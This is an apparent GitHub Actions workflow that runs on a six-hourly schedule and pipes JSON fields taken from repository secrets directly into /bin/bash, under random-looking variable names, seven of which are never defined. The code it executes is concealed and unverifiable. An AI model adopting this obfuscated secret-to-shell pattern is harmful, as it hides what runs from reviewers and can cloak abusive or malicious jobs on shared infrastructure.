name: qingrenhy
on:
  workflow_dispatch:
  schedule:
    - cron: '35 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: qingrenhy
        env:
          jxspw1654: ${{ secrets.jxspw1654 }}
        run: |
          echo $jxspw1654 | jq -r .ck0084 | /bin/bash
          echo $m80 | jq -r .wz60 | /bin/bash
          echo $adowe814 | jq -r .gmjdm313 | /bin/bash
          echo $tjpq692 | jq -r .ni72750 | /bin/bash
          echo $fcmf5 | jq -r .v8 | /bin/bash
          echo $iaj77 | jq -r .p887 | /bin/bash
          echo $m003 | jq -r .gh61 | /bin/bash
          echo $ugkq23155 | jq -r .w06 | /bin/bash

